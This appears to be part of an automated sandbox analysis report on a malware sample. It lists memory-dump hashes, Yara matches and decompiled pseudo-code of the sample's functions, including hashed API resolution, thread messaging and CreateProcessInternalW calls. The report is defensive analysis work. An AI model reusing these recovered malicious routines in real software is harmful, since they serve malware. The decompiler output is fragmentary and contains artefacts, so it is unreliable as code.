                                                                      • Opcode Fuzzy Hash: 1551548ede44ee2b18f9872144e928b5f35854fbd1d2b1743b9db44e23b27c66
                                                                      • Instruction Fuzzy Hash: A09002A534100842D500619A4414B060009E7E1345F51C025E1454554DCA59CC567166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 80a817ef5c4fa87b6e222e060a2caec98f409b50760b2c6fcb703f122a42639f
                                                                      • Instruction ID: 7e91564f755aa5196cd1ff7fdec484e0bfc1ecb64a10a1a57eeacae75297b44c
                                                                      • Opcode Fuzzy Hash: 80a817ef5c4fa87b6e222e060a2caec98f409b50760b2c6fcb703f122a42639f
                                                                      • Instruction Fuzzy Hash: 0A9002A5302004038505719A4414616400EA7E0245B51C031E1404590DC96588957165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8e33afdb974461a4fdb83491632ea5ca1d84fa048ed9ca9254a59d32bf42d329
                                                                      • Instruction ID: b9363684b3b99139d813ef1f50bacf8434a63732cea1d7eccd8e796151ebc6e7
                                                                      • Opcode Fuzzy Hash: 8e33afdb974461a4fdb83491632ea5ca1d84fa048ed9ca9254a59d32bf42d329
                                                                      • Instruction Fuzzy Hash: DD90027530100813D511619A4504707000DA7D0285F91C422A0814558DDA968956B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b168fc0bbb4a813e34954495a6b6d7dcffca2ef069a88a1279a31c54d1dea768
                                                                      • Instruction ID: cb609b759b059cffd4f99b58bf8eec52870caab3ef28f347d3b58d1697c82448
                                                                      • Opcode Fuzzy Hash: b168fc0bbb4a813e34954495a6b6d7dcffca2ef069a88a1279a31c54d1dea768
                                                                      • Instruction Fuzzy Hash: A5900265342045529945B19A4404507400AB7E0285791C022A1804950CC966985AE661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 804c9374c996f47fbfcb6f22da701a2d27c70842417404b17abff7ec951de7ed
                                                                      • Instruction ID: 8fcb114488f07654f92274aec9c6cc5b4faa4b2d6f8e4de69a20da0344a430c3
                                                                      • Opcode Fuzzy Hash: 804c9374c996f47fbfcb6f22da701a2d27c70842417404b17abff7ec951de7ed
                                                                      • Instruction Fuzzy Hash: B590026570100902D501719A4404616000EA7D0285F91C032A1414555ECE658996B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 1bff2e38ab8ce450cd606b2d89684d7b4528fd54a5881232aee8ddcb2fec8821
                                                                      • Instruction ID: d3772b07e4ecd6d9a8feead5a02e631e8cd5c2c824316961fed4eea5e673a874
                                                                      • Opcode Fuzzy Hash: 1bff2e38ab8ce450cd606b2d89684d7b4528fd54a5881232aee8ddcb2fec8821
                                                                      • Instruction Fuzzy Hash: E690027530100802D50065DA54086460009A7E0345F51D021A5414555ECAA588957171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6540b01b4942cd0c99c922873a2cb6459d416fe2d53b5159f112522508a2af9c
                                                                      • Instruction ID: bb34f8445c3a53a64f17b24387c7b56ac80a6a6258890ba0c0c8079fb34794c8
                                                                      • Opcode Fuzzy Hash: 6540b01b4942cd0c99c922873a2cb6459d416fe2d53b5159f112522508a2af9c
                                                                      • Instruction Fuzzy Hash: 2D90026530100403D540719A54186064009F7E1345F51D021E0804554CDD55885A6262
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 0b94a5d11c0acedd6ddd78dcdc59cbd0d1323106f7340cfec6a1e0cceb1e0890
                                                                      • Instruction ID: df4dc27284de4f3c2dae206450bd8261de5e1cc8a2c7abed1e29915f258c8694
                                                                      • Opcode Fuzzy Hash: 0b94a5d11c0acedd6ddd78dcdc59cbd0d1323106f7340cfec6a1e0cceb1e0890
                                                                      • Instruction Fuzzy Hash: 5890026D31300402D580719A540860A0009A7D1246F91D425A0405558CCD55886D6361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8fb47ecfa647d30b507a517f579896f66c905ace074b3ca136d46ed96bd5b384
                                                                      • Instruction ID: e047920edb2c5f80242aedc3c6c301ded9241d3c0fc7dcfe4fa03671e7f32660
                                                                      • Opcode Fuzzy Hash: 8fb47ecfa647d30b507a517f579896f66c905ace074b3ca136d46ed96bd5b384
                                                                      • Instruction Fuzzy Hash: FC90027531114802D510619A84047060009A7D1245F51C421A0C14558DCAD588957162
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 18880ef683d807ce0d7c785ca181a858b4e04a32ee9592e54e7dbdf08cabb7db
                                                                      • Instruction ID: d8297b4b7de2ed6e387eda82887068cd28924775371b159286e0d08a9aad3ee5
                                                                      • Opcode Fuzzy Hash: 18880ef683d807ce0d7c785ca181a858b4e04a32ee9592e54e7dbdf08cabb7db
                                                                      • Instruction Fuzzy Hash: BD90026570100442854071AA88449064009BBE1255751C131A0D88550DC999886966A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 179071c40f938b72d9570839522ab6177c7bce64d4c2a597f0ac51bb6695ea78
                                                                      • Instruction ID: c9b8ff0a976299e5410db7d088b23055d343080e9722a3661ea21c37134f846c
                                                                      • Opcode Fuzzy Hash: 179071c40f938b72d9570839522ab6177c7bce64d4c2a597f0ac51bb6695ea78
                                                                      • Instruction Fuzzy Hash: 4390027530140802D500619A481470B0009A7D0346F51C021A1554555DCA65885575B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 37234fde236ba823021d8409bb6d24ae039ac52a702aa330b51039fc396f0323
                                                                      • Instruction ID: 22b766055441f94b72d24bb57f400d2014c01d41b7ffc1e6e691e19c49556236
                                                                      • Opcode Fuzzy Hash: 37234fde236ba823021d8409bb6d24ae039ac52a702aa330b51039fc396f0323
                                                                      • Instruction Fuzzy Hash: 7390027530100C02D580719A440464A0009A7D1345F91C025A0415654DCE558A5D77E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: dab212fdb5f446598076d26c610f9a80846748b863df2e2630c1e60e9da92159
                                                                      • Instruction ID: 96b9dc4cf288968ee11fcdeeb39cd555b1dedf6d961873e18788499ec7d619a1
                                                                      • Opcode Fuzzy Hash: dab212fdb5f446598076d26c610f9a80846748b863df2e2630c1e60e9da92159
                                                                      • Instruction Fuzzy Hash: 6090026531180442D60065AA4C14B070009A7D0347F51C125A0544554CCD5588656561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 4fa1722fc97b3dfac3258b505a54780e38479f3a7f8772665031b0143da1fc64
                                                                      • Instruction ID: f134999c189e5ad8aed9dad0ec2eecd18ca2b9a9a6d5b143c798e3205763dc16
                                                                      • Opcode Fuzzy Hash: 4fa1722fc97b3dfac3258b505a54780e38479f3a7f8772665031b0143da1fc64
                                                                      • Instruction Fuzzy Hash: 2B90027530108C02D510619A840474A0009A7D0345F55C421A4814658DCAD588957161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                      • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                                                                      • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                      • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                      				void* _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                      				_t6 =  &_a8; // 0x413526
                                                                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}





                                                                      0x004188b7
                                                                      0x004188c2
                                                                      0x004188cd
                                                                      0x004188d1

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: &5A
                                                                      • API String ID: 1279760036-1617645808
                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                                                      				char _v67;
                                                                      				char _v68;
                                                                      				void* _t12;
                                                                      				int _t13;
                                                                      				long _t20;
                                                                      				intOrPtr _t23;
                                                                      				int _t25;
                                                                      				void* _t28;
                                                                      				void* _t29;
                                                                      				void* _t34;
                                                                      
                                                                      				_t34 = __eflags;
                                                                      				_t28 = _t29;
                                                                      				_v68 = 0;
                                                                      				E0041A130( &_v67, 0, 0x3f);
                                                                      				E0041AD10( &_v68, 3);
                                                                      				_t23 = _a4;
                                                                      				_t12 = E00409B30(_t34, _t23 + 0x1c,  &_v68); // executed
                                                                      				_t13 = E00413E40(_t23 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                      				_t25 = _t13;
                                                                      				if(_t25 != 0) {
                                                                      					_t20 = _a8;
                                                                      					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                                                      					_t36 = _t13;
                                                                      					if(_t13 == 0) {
                                                                      						_t13 =  *_t25(_t20, 0x8003, _t28 + (E00409290(_t36, 1, 8) & 0x000000ff) - 0x40, _t13);
                                                                      					}
                                                                      				}
                                                                      				asm("in eax, 0x5d");
                                                                      				return _t13;
                                                                      			}













                                                                      0x00407280
                                                                      0x00407281
                                                                      0x0040728f
                                                                      0x00407293
                                                                      0x0040729e
                                                                      0x004072a3
                                                                      0x004072ae
                                                                      0x004072be
                                                                      0x004072c3
                                                                      0x004072ca
                                                                      0x004072cd
                                                                      0x004072da
                                                                      0x004072dc
                                                                      0x004072de
                                                                      0x004072fb
                                                                      0x004072fb
                                                                      0x004072fd
                                                                      0x00407300
                                                                      0x00407302

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                      • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                                                      • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                      • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E00407303(int __eax, void* __ebx, void* __edx, intOrPtr _a4, int _a8, long _a12, int _a16) {
                                                                      				int _v8;
                                                                      				int _v132;
                                                                      				int _v136;
                                                                      				char _v656;
                                                                      				int _v668;
                                                                      				char _v684;
                                                                      				char _v688;
                                                                      				intOrPtr __edi;
                                                                      				int __esi;
                                                                      				void* __ebp;
                                                                      				int _t59;
                                                                      				void* _t60;
                                                                      				long _t68;
                                                                      				void* _t70;
                                                                      				int _t72;
                                                                      				void* _t74;
                                                                      
                                                                      				_t59 = __eax;
                                                                      				_t79 = __ebx - __edx;
                                                                      				_push(__edx);
                                                                      				if(__ebx - __edx > 0) {
                                                                      					L6:
                                                                      					asm("in eax, 0x5d");
                                                                      					return _t59;
                                                                      				} else {
                                                                      					_pop(__ebx);
                                                                      					if(__eflags < 0) {
                                                                      						_t60 = E00409B30(_t79, _t70 + 0x1c, __edx); // executed
                                                                      						_t59 = E00413E40(_t70 + 0x1c, _t60, 0, 0, 0xc4e7b6d6);
                                                                      						_t72 = _t59;
                                                                      						if(_t72 != 0) {
                                                                      							_t68 = _a12;
                                                                      							_t59 = PostThreadMessageW(_t68, 0x111, 0, 0); // executed
                                                                      							_t81 = _t59;
                                                                      							if(_t59 == 0) {
                                                                      								_t59 =  *_t72(_t68, 0x8003, _t74 + (E00409290(_t81, 1, 8) & 0x000000ff) - 0x40, _t59);
                                                                      							}
                                                                      						}
                                                                      						goto L6;
                                                                      					} else {
                                                                      						__eflags = __eax;
                                                                      						_push(__ebp);
                                                                      						__ebp = __esp;
                                                                      						__esp = __esp - 0x2ac;
                                                                      						_push(__ebx);
                                                                      						_push(__esi);
                                                                      						_push(__edi);
                                                                      						__eax = 0;
                                                                      						_v8 = 0;
                                                                      						_v688 = 0;
                                                                      						 &_v684 = E0041A130( &_v684, 0, 0x2a4);
                                                                      						__esi = _a16;
                                                                      						__ecx =  *((intOrPtr*)(__esi + 0x300));
                                                                      						__edi = _a4;
                                                                      						__eax = E00407280(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
                                                                      						__eax = E004199C0(__ecx);
                                                                      						_t12 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                                                                      						__ebx = __eax + _t12;
                                                                      						_a16 = 0;
                                                                      						while(1) {
                                                                      							__eax = E0040D3C0(__edi, 0xfe363c80); // executed
                                                                      							__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                      							__eax =  &_v688;
                                                                      							__eax = E00418770(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
                                                                      							 *(__esi + 0x2dc) = __eax;
                                                                      							__eflags = __eax;
                                                                      							if(__eax < 0) {
                                                                      								break;
                                                                      							}
                                                                      							__eflags = _v656;
                                                                      							if(_v656 == 0) {
                                                                      								L15:
                                                                      								__eax = _a16;
                                                                      								__eax = _a16 + 1;
                                                                      								_a16 = __eax;
                                                                      								__eflags = __eax - 2;
                                                                      								if(__eax < 2) {
                                                                      									continue;
                                                                      								} else {
                                                                      									__ebx = _v8;
                                                                      									goto L19;
                                                                      								}
                                                                      							} else {
                                                                      								__eflags = _v668;
                                                                      								if(_v668 == 0) {
                                                                      									goto L15;
                                                                      								} else {
                                                                      									__eflags = _v136;
                                                                      									if(_v136 == 0) {
                                                                      										goto L15;
                                                                      									} else {
                                                                      										__eflags = _v132;
                                                                      										if(_v132 != 0) {
                                                                      											__eax = _a12;
                                                                      											__edx =  &_v688;
                                                                      											__ebx = 1;
                                                                      											__eax = E0041A0B0(_a12,  &_v688, 0x2a8);
                                                                      											L19:
                                                                      											__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                      											__eax = E00418700(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
                                                                      											__eflags = __ebx;
                                                                      											if(__ebx == 0) {
                                                                      												break;
                                                                      											} else {
                                                                      												__edx = _v668;
                                                                      												__eax = _a12;
                                                                      												__ecx = _v136;
                                                                      												 *(_a12 + 0x14) = _v668;
                                                                      												__edx =  *(__esi + 0x2d0);
                                                                      												_t32 = __esi + 0x2e8; // 0x2e8
                                                                      												__eax = _t32;
                                                                      												 *_t32 = _v136;
                                                                      												__eax = _a12;
                                                                      												_t34 = __esi + 0x314; // 0x314
                                                                      												__ebx = _t34;
                                                                      												__ecx = 0;
                                                                      												__eax = _a12 + 0x220;
                                                                      												 *__ebx = 0x18;
                                                                      												 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                      												 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                      												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                      												 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                      												 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                      												__eax = E00417F80(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
                                                                      												__ecx = 0;
                                                                      												 *(__esi + 0x2dc) = __eax;
                                                                      												__eflags = __eax;
                                                                      												if(__eax < 0) {
                                                                      													break;
                                                                      												} else {
                                                                      													__edx = _v132;
                                                                      													_t42 = __esi + 0x2e0; // 0x2e0
                                                                      													__eax = _t42;
                                                                      													 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                      													 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                      													 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                      													 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                      													 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                      													_a12 = _a12 + 0x224;
                                                                      													 *(__esi + 0x2e4) = _v132;
                                                                      													 *__ebx = 0x18;
                                                                      													 *(__esi + 0x2d0) = 0x1a;
                                                                      													__eax = E00417FC0(__edi, _a12 + 0x224, 0x1a, __ebx, _t42);
                                                                      													 *(__esi + 0x2dc) = __eax;
                                                                      													__eflags = __eax;
                                                                      													if(__eax < 0) {
                                                                      														break;
                                                                      													} else {
                                                                      														__edx = _a8;
                                                                      														 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
                                                                      														__eflags =  *(__edx + 0x10) + 0x200;
                                                                      														_push(E00419660(__ecx));
                                                                      														__ebx = E00419680();
                                                                      														__eax =  *(__ebx + 0x28);
                                                                      														__eax = E0041A3A0( *(__ebx + 0x28));
                                                                      														__edx =  *(__ebx + 0x28);
                                                                      														_t57 = __eax + 2; // 0x2
                                                                      														__ecx = __eax + _t57;
                                                                      														__eax =  &_v656;
                                                                      														__eax = E00413A40(__edi,  &_v656, 2, 0, 0);
                                                                      														_pop(__edi);
                                                                      														_pop(__esi);
                                                                      														_pop(__ebx);
                                                                      														__esp = __ebp;
                                                                      														_pop(__ebp);
                                                                      														return __eax;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											goto L15;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							goto L23;
                                                                      						}
                                                                      						_pop(__edi);
                                                                      						_pop(__esi);
                                                                      						__eax = 0;
                                                                      						__eflags = 0;
                                                                      						_pop(__ebx);
                                                                      						__esp = __ebp;
                                                                      						_pop(__ebp);
                                                                      						return 0;
                                                                      					}
                                                                      				}
                                                                      				L23:
                                                                      			}



















                                                                      0x00407303
                                                                      0x00407303
                                                                      0x00407305
                                                                      0x00407306
                                                                      0x00407300
                                                                      0x00407300
                                                                      0x00407302
                                                                      0x00407308
                                                                      0x00407308
                                                                      0x00407309
                                                                      0x004072ae
                                                                      0x004072be
                                                                      0x004072c3
                                                                      0x004072ca
                                                                      0x004072cd
                                                                      0x004072da
                                                                      0x004072dc
                                                                      0x004072de
                                                                      0x004072fb
                                                                      0x004072fb
                                                                      0x004072fd
                                                                      0x00000000
                                                                      0x0040730b
                                                                      0x0040730b
                                                                      0x00407310
                                                                      0x00407311
                                                                      0x00407313
                                                                      0x00407319
                                                                      0x0040731a
                                                                      0x0040731b
                                                                      0x0040731c
                                                                      0x00407324
                                                                      0x00407327
                                                                      0x00407334
                                                                      0x00407339
                                                                      0x0040733c
                                                                      0x00407342
                                                                      0x00407347
                                                                      0x0040734f
                                                                      0x0040735a
                                                                      0x0040735a
                                                                      0x00407361
                                                                      0x00407370
                                                                      0x00407376
                                                                      0x0040737b
                                                                      0x00407388
                                                                      0x00407392
                                                                      0x0040739a
                                                                      0x004073a0
                                                                      0x004073a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004073a4
                                                                      0x004073ac
                                                                      0x004073c6
                                                                      0x004073c6
                                                                      0x004073c9
                                                                      0x004073ca
                                                                      0x004073cd
                                                                      0x004073d0
                                                                      0x00000000
                                                                      0x004073d2
                                                                      0x004073d2
                                                                      0x00000000
                                                                      0x004073d2
                                                                      0x004073ae
                                                                      0x004073ae
                                                                      0x004073b5
                                                                      0x00000000
                                                                      0x004073b7
                                                                      0x004073b7
                                                                      0x004073be
                                                                      0x00000000
                                                                      0x004073c0
                                                                      0x004073c0
                                                                      0x004073c4
                                                                      0x004073e0
                                                                      0x004073e8
                                                                      0x004073f0
                                                                      0x004073f5
                                                                      0x004073fd
                                                                      0x004073fd
                                                                      0x00407405
                                                                      0x0040740d
                                                                      0x0040740f
                                                                      0x00000000
                                                                      0x00407411
                                                                      0x00407411
                                                                      0x00407417
                                                                      0x0040741a
                                                                      0x00407420
                                                                      0x00407423
                                                                      0x00407429
                                                                      0x00407429
                                                                      0x00407430
                                                                      0x00407432
                                                                      0x00407435
                                                                      0x00407435
                                                                      0x0040743c
                                                                      0x0040743f
                                                                      0x00407446
                                                                      0x0040744c
                                                                      0x00407452
                                                                      0x00407458
                                                                      0x0040745e
                                                                      0x00407464
                                                                      0x0040746a
                                                                      0x0040746f
                                                                      0x00407474
                                                                      0x0040747a
                                                                      0x0040747c
                                                                      0x00000000
                                                                      0x00407482
                                                                      0x00407482
                                                                      0x00407485
                                                                      0x00407485
                                                                      0x0040748c
                                                                      0x00407492
                                                                      0x00407498
                                                                      0x0040749e
                                                                      0x004074a4
                                                                      0x004074b0
                                                                      0x004074b8
                                                                      0x004074be
                                                                      0x004074c4
                                                                      0x004074ce
                                                                      0x004074d6
                                                                      0x004074dc
                                                                      0x004074de
                                                                      0x00000000
                                                                      0x004074e4
                                                                      0x004074e4
                                                                      0x004074ea
                                                                      0x004074ea
                                                                      0x004074f5
                                                                      0x004074fd
                                                                      0x004074ff
                                                                      0x00407503
                                                                      0x00407508
                                                                      0x0040750b
                                                                      0x0040750b
                                                                      0x0040751b
                                                                      0x00407523
                                                                      0x0040752b
                                                                      0x0040752c
                                                                      0x0040752d
                                                                      0x0040752e
                                                                      0x00407530
                                                                      0x00407531
                                                                      0x00407531
                                                                      0x004074de
                                                                      0x0040747c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004073c4
                                                                      0x004073be
                                                                      0x004073b5
                                                                      0x00000000
                                                                      0x004073ac
                                                                      0x004073d7
                                                                      0x004073d8
                                                                      0x004073d9
                                                                      0x004073d9
                                                                      0x004073db
                                                                      0x004073dc
                                                                      0x004073de
                                                                      0x004073df
                                                                      0x004073df
                                                                      0x00407309
                                                                      0x00000000

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 6f0ce8d0d9df1eaa4cef9bc742a029687e560546f406980c5bc1f5961d88109f
                                                                      • Instruction ID: 12c19b6347be1b8c2bba782a2d6aa6c76b149596bab8c264194dc966899e50ec
                                                                      • Opcode Fuzzy Hash: 6f0ce8d0d9df1eaa4cef9bc742a029687e560546f406980c5bc1f5961d88109f
                                                                      • Instruction Fuzzy Hash: F0F0BE31A802253AF52126A52C43FBF665C5B41F20F26447FFF04F92C2E9AC790242EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E00418950(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
                                                                      				void* _t22;
                                                                      				void* _t33;
                                                                      				intOrPtr* _t34;
                                                                      
                                                                      				_t3 = _a4 + 0xc80; // 0x8bec97d5
                                                                      				_t34 = _t3;
                                                                      				E004191D0(_t33, _a4, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
                                                                      				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                                      				return _t22;
                                                                      			}






                                                                      0x00418962
                                                                      0x00418962
                                                                      0x0041896a
                                                                      0x004189a4
                                                                      0x004189a8

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,z@,?,?,?), ref: 004189A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                      • Instruction ID: 911db517c5bfb93c480bf4e8b2cb4a6d15252e6a9ee60ca7031b543c1908ba65
                                                                      • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
